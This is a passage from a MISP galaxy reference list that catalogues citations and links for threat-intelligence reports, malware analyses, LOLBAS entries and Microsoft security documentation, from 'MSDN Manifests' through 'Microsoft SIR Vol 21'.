The tag is: misp-galaxy:references="MSDN Manifests"

Table 14393. Table References

Links

https://msdn.microsoft.com/en-us/library/aa375365

Wikipedia Man in the Browser

Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.

The tag is: misp-galaxy:references="Wikipedia Man in the Browser"

Table 14394. Table References

Links

https://en.wikipedia.org/wiki/Man-in-the-browser

Kaspersky Encyclopedia MiTM

Kaspersky IT Encyclopedia. (n.d.). Man-in-the-middle attack. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="Kaspersky Encyclopedia MiTM"

Table 14395. Table References

Links

https://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/

Rapid7 MiTM Basics

Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.

The tag is: misp-galaxy:references="Rapid7 MiTM Basics"

Table 14396. Table References

Links

https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/

Praetorian TLS Downgrade Attack 2014

Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.

The tag is: misp-galaxy:references="Praetorian TLS Downgrade Attack 2014"

Table 14397. Table References

Links

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

mitm_tls_downgrade_att

praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.

The tag is: misp-galaxy:references="mitm_tls_downgrade_att"

Table 14398. Table References

Links

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

InsiderThreat ChangeNTLM July 2017

Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="InsiderThreat ChangeNTLM July 2017"

Table 14399. Table References

Links

https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM

Kaspersky ManOnTheSide

Starikova, A. (2023, February 14). Man-on-the-side – peculiar attack. Retrieved September 1, 2023.

The tag is: misp-galaxy:references="Kaspersky ManOnTheSide"

Table 14400. Table References

Links

https://usa.kaspersky.com/blog/man-on-the-side/27854/

CrowdStrike Manufacturing Threat July 2020

Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="CrowdStrike Manufacturing Threat July 2020"

Table 14401. Table References

Links

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

US-CERT TYPEFRAME June 2018

US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.

The tag is: misp-galaxy:references="US-CERT TYPEFRAME June 2018"

Table 14402. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-165A

US-CERT KEYMARBLE Aug 2018

US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.

The tag is: misp-galaxy:references="US-CERT KEYMARBLE Aug 2018"

Table 14403. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-221A

US-CERT HOPLIGHT Apr 2019

US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="US-CERT HOPLIGHT Apr 2019"

Table 14404. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR19-100A

US-CERT HOTCROISSANT February 2020

US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="US-CERT HOTCROISSANT February 2020"

Table 14405. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/ar20-045d

CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020

USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.

The tag is: misp-galaxy:references="CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020"

Table 14406. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b

CISA MAR-10292089-1.v2 TAIDOOR August 2021

CISA, FBI, DOD. (2021, August). MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="CISA MAR-10292089-1.v2 TAIDOOR August 2021"

Table 14407. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a

US-CERT BLINDINGCAN Aug 2020

US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.

The tag is: misp-galaxy:references="US-CERT BLINDINGCAN Aug 2020"

Table 14408. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a

CISA SoreFang July 2016

CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="CISA SoreFang July 2016"

Table 14409. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a

CISA WellMess July 2020

CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.

The tag is: misp-galaxy:references="CISA WellMess July 2020"

Table 14410. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b

CISA WellMail July 2020

CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="CISA WellMail July 2020"

Table 14411. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c

CISA EB Aug 2020

Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="CISA EB Aug 2020"

Table 14412. Table References

Links

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a

CISA HatMan

CISA. (2019, February 27). MAR-17-352-01 HatMan-Safety System Targeted Malware. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="CISA HatMan"

Table 14413. Table References

Links

https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

Outflank MotW 2020

Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Outflank MotW 2020"

Table 14414. Table References

Links

https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/

Masquerads-Guardio

Tal, Nati. (2022, December 28). “MasquerAds” — Google’s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs and Crypto Wallets. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Masquerads-Guardio"

Table 14415. Table References

Links

https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e

CNET Leaks

Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="CNET Leaks"

Table 14416. Table References

Links

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

ArsTechnica Great Firewall of China

Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="ArsTechnica Great Firewall of China"

Table 14417. Table References

Links

https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/

Europol Cobalt Mar 2018

Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="Europol Cobalt Mar 2018"

Table 14418. Table References

Links

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

LOLBAS Mavinject

LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="LOLBAS Mavinject"

Table 14419. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Mavinject/

Mavinject Functionality Deconstructed

Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Mavinject Functionality Deconstructed"

Table 14420. Table References

Links

https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e

Sophos Maze VM September 2020

Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="Sophos Maze VM September 2020"

Table 14421. Table References

Links

https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/

mbed-crypto

ARMmbed. (2018, June 21). Mbed Crypto. Retrieved February 15, 2021.

The tag is: misp-galaxy:references="mbed-crypto"

Table 14422. Table References

Links

https://github.com/ARMmbed/mbed-crypto

McAfee REvil October 2019

Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.

The tag is: misp-galaxy:references="McAfee REvil October 2019"

Table 14423. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/

McAfee Sodinokibi October 2019

McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="McAfee Sodinokibi October 2019"

Table 14424. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

McAfee Sandworm November 2013

Li, H. (2013, November 5). McAfee Labs Detects Zero-Day Exploit Targeting Microsoft Office. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="McAfee Sandworm November 2013"

Table 14425. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2

McAfee Honeybee

Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="McAfee Honeybee"

Table 14426. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

Secureworks MCMD July 2019

Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="Secureworks MCMD July 2019"

Table 14427. Table References

Links

https://www.secureworks.com/research/mcmd-malware-analysis

Purves Kextpocalypse 2

Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Purves Kextpocalypse 2"

Table 14428. Table References

Links

https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/

MDSec Brute Ratel August 2022

Chell, D. PART 3: How I Met Your Beacon – Brute Ratel. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="MDSec Brute Ratel August 2022"

Table 14429. Table References

Links

https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/

Secureworks NICKEL ACADEMY Dec 2017

Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.

The tag is: misp-galaxy:references="Secureworks NICKEL ACADEMY Dec 2017"

Table 14430. Table References

Links

https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing

HC3 Analyst Note MedusaLocker Ransomware February 2023

Health Sector Cybersecurity Coordination Center (HC3). (2023, February 24). MedusaLocker Ransomware. Retrieved August 11, 2023.

The tag is: misp-galaxy:references="HC3 Analyst Note MedusaLocker Ransomware February 2023"

Table 14431. Table References

Links

https://www.hhs.gov/sites/default/files/medusalocker-ransomware-analyst-note.pdf

Cybereason Nocturnus MedusaLocker 2020

Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Cybereason Nocturnus MedusaLocker 2020"

Table 14432. Table References

Links

https://www.cybereason.com/blog/medusalocker-ransomware

Bleeping Computer Medusa Ransomware March 12 2023

Lawrence Abrams. (2023, March 12). Medusa ransomware gang picks up steam as it targets companies worldwide. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Bleeping Computer Medusa Ransomware March 12 2023"

Table 14433. Table References

Links

https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/

CyberScoop Babuk February 2021

Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="CyberScoop Babuk February 2021"

Table 14434. Table References

Links

https://www.cyberscoop.com/babuk-ransomware-serco-attack/

CrowdStrike Stardust Chollima Profile April 2018

Meyers, Adam. (2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="CrowdStrike Stardust Chollima Profile April 2018"

Table 14435. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/

CrowdStrike VOODOO BEAR

Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="CrowdStrike VOODOO BEAR"

Table 14436. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/

Crowdstrike MUSTANG PANDA June 2018

Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.

The tag is: misp-galaxy:references="Crowdstrike MUSTANG PANDA June 2018"

Table 14437. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

CrowdStrike VENOMOUS BEAR

Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="CrowdStrike VENOMOUS BEAR"

Table 14438. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/

Crowdstrike Helix Kitten Nov 2018

Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.

The tag is: misp-galaxy:references="Crowdstrike Helix Kitten Nov 2018"

Table 14439. Table References

Links

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/

Cloudflare Memcrashed Feb 2018

Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="Cloudflare Memcrashed Feb 2018"

Table 14440. Table References

Links

https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/

Github Mempdump

DiabloHorn. (2015, March 22). mempdump. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="Github Mempdump"

Table 14441. Table References

Links

https://github.com/DiabloHorn/mempdump

Palo Alto menuPass Feb 2017

Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Palo Alto menuPass Feb 2017"

Table 14442. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

FireEye MESSAGETAP October 2019

Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.

The tag is: misp-galaxy:references="FireEye MESSAGETAP October 2019"

Table 14443. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html

SentinelLabs Metador Technical Appendix Sept 2022

SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023.

The tag is: misp-galaxy:references="SentinelLabs Metador Technical Appendix Sept 2022"

Table 14444. Table References

Links

https://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#heading=h.lmnbtht1ikzm

FireEye Metamorfo Apr 2018

Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.

The tag is: misp-galaxy:references="FireEye Metamorfo Apr 2018"

Table 14445. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html

Metasploit_Ref

Metasploit. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Metasploit_Ref"

Table 14446. Table References

Links

http://www.metasploit.com

Metasploit SSH Module

undefined. (n.d.). Retrieved April 12, 2019.

The tag is: misp-galaxy:references="Metasploit SSH Module"

Table 14447. Table References

Links

https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh

Github Rapid7 Meterpreter Elevate

Rapid7. (2013, November 26). meterpreter/source/extensions/priv/server/elevate/. Retrieved July 8, 2018.

The tag is: misp-galaxy:references="Github Rapid7 Meterpreter Elevate"

Table 14448. Table References

Links

https://github.com/rapid7/meterpreter/tree/master/source/extensions/priv/server/elevate

Methods of Mac Malware Persistence

Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Methods of Mac Malware Persistence"

Table 14449. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

MFA Fatigue Attacks - PortSwigger

Jessica Haworth. (2022, February 16). MFA fatigue attacks: Users tricked into allowing device access due to overload of push notifications. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="MFA Fatigue Attacks - PortSwigger"

Table 14450. Table References

Links

https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications

Mftrace.exe - LOLBAS Project

LOLBAS. (2018, May 25). Mftrace.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Mftrace.exe - LOLBAS Project"

Table 14451. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/

Radware Micropsia July 2018

Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Radware Micropsia July 2018"

Table 14452. Table References

Links

https://blog.radware.com/security/2018/07/micropsia-malware/

Microsoft Midnight Blizzard January 19 2024

MSRC. (2024, January 19). Microsoft Actions Following Attack by Nation State Actor Midnight Blizzard. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="Microsoft Midnight Blizzard January 19 2024"

Table 14453. Table References

Links

https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/

Microsoft ZINC disruption Dec 2017

Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft ZINC disruption Dec 2017"

Table 14454. Table References

Links

https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/

The Hacker News Microsoft DDoS June 19 2023

Ravie Lakshmanan. (2023, June 19). Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="The Hacker News Microsoft DDoS June 19 2023"

Table 14455. Table References

Links

https://thehackernews.com/2023/06/microsoft-blames-massive-ddos-attack.html

Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.

The tag is: misp-galaxy:references="Microsoft OAuth 2.0 Consent Phishing 2021"

Table 14456. Table References

Links

https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/

Microsoft Digital Defense FY20 Sept 2020

Microsoft . (2020, September 29). Microsoft Digital Defense Report FY20. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="Microsoft Digital Defense FY20 Sept 2020"

Table 14457. Table References

Links

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf

BleepingComputer DDE Disabled in Word Dec 2017

Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="BleepingComputer DDE Disabled in Word Dec 2017"

Table 14458. Table References

Links

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

Microsoft DuplicateTokenEx

Microsoft TechNet. (n.d.). Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft DuplicateTokenEx"

Table 14459. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx

Red Canary HTA Abuse Part Deux

McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.

The tag is: misp-galaxy:references="Red Canary HTA Abuse Part Deux"

Table 14460. Table References

Links

https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/

Microsoft HTML Help May 2018

Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.

The tag is: misp-galaxy:references="Microsoft HTML Help May 2018"

Table 14461. Table References

Links

https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk

Microsoft Identity Platform Access 2019

Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Identity Platform Access 2019"

Table 14462. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

Microsoft - Azure AD Identity Tokens - Aug 2019

Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft - Azure AD Identity Tokens - Aug 2019"

Table 14463. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

Microsoft - OAuth Code Authorization flow - June 2019

Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft - OAuth Code Authorization flow - June 2019"

Table 14464. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow

Microsoft Identity Platform Protocols May 2019

Microsoft. (n.d.). Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Microsoft Identity Platform Protocols May 2019"

Table 14465. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols

Microsoft ImpersonateLoggedOnUser

Microsoft TechNet. (n.d.). Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft ImpersonateLoggedOnUser"

Table 14466. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx

Microsoft Internal Solorigate Investigation Blog

MSRC Team. (2021, February 18). Microsoft Internal Solorigate Investigation – Final Update. Retrieved May 14, 2021.

The tag is: misp-galaxy:references="Microsoft Internal Solorigate Investigation Blog"

Table 14467. Table References

Links

https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/

Microsoft LogonUser

Microsoft TechNet. (n.d.). Retrieved April 25, 2017.

The tag is: misp-galaxy:references="Microsoft LogonUser"

Table 14468. Table References

Links

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx

mmc_vulns

Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="mmc_vulns"

Table 14469. Table References

Links

https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/

Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project

LOLBAS. (2022, January 20). Microsoft.NodejsTools.PressAnyKey.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project"

Table 14470. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/

FireEye FELIXROOT July 2018

Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.

The tag is: misp-galaxy:references="FireEye FELIXROOT July 2018"

Table 14471. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html

Irongeek Sims BSides 2017

Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Irongeek Sims BSides 2017"

Table 14472. Table References

Links

https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims

Microsoft_rec_block_rules

Microsoft. (2021, August 23). Retrieved August 16, 2021.

The tag is: misp-galaxy:references="Microsoft_rec_block_rules"

Table 14473. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Microsoft WDAC

Coulter, D. et al.. (2019, April 9). Microsoft recommended block rules. Retrieved August 12, 2021.

The tag is: misp-galaxy:references="Microsoft WDAC"

Table 14474. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Microsoft driver block rules

Jordan Geurten et al. . (2022, March 29). Microsoft recommended driver block rules. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="Microsoft driver block rules"

Table 14475. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules

Microsoft Driver Block Rules

Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Microsoft Driver Block Rules"

Table 14476. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules

Microsoft Register-WmiEvent

Microsoft. (n.d.). Retrieved January 24, 2020.

The tag is: misp-galaxy:references="Microsoft Register-WmiEvent"

Table 14477. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1

Microsoft DDoS Attacks Response June 2023

MSRC Team. (2023, June 16). Microsoft Response to Layer 7 Distributed Denial of Service (DDoS) Attacks. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Microsoft DDoS Attacks Response June 2023"

Table 14478. Table References

Links

https://msrc.microsoft.com/blog/2023/06/microsoft-response-to-layer-7-distributed-denial-of-service-ddos-attacks/

Microsoft Security Advisory 2269637

Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Microsoft Security Advisory 2269637"

Table 14479. Table References

Links

https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637

Microsoft 2269637

Microsoft. (2010, August 22). Microsoft Security Advisory 2269637 Released. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Microsoft 2269637"

Table 14480. Table References

Links

https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/

Microsoft DDE Advisory Nov 2017

Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="Microsoft DDE Advisory Nov 2017"

Table 14481. Table References

Links

https://technet.microsoft.com/library/security/4053440

Microsoft WDigest Mit

Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020.

The tag is: misp-galaxy:references="Microsoft WDigest Mit"

Table 14482. Table References

Links

https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a

MS17-010 March 2017

Microsoft. (2017, March 14). Microsoft Security Bulletin MS17-010 - Critical. Retrieved August 17, 2017.

The tag is: misp-galaxy:references="MS17-010 March 2017"

Table 14483. Table References

Links

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

MSTIC GADOLINIUM September 2020

Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="MSTIC GADOLINIUM September 2020"

Table 14484. Table References

Links

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

Microsoft SIR Vol 19

Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Microsoft SIR Vol 19"

Table 14485. Table References

Links

http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf

Microsoft SIR Vol 21

Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft SIR Vol 21"

Table 14486. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

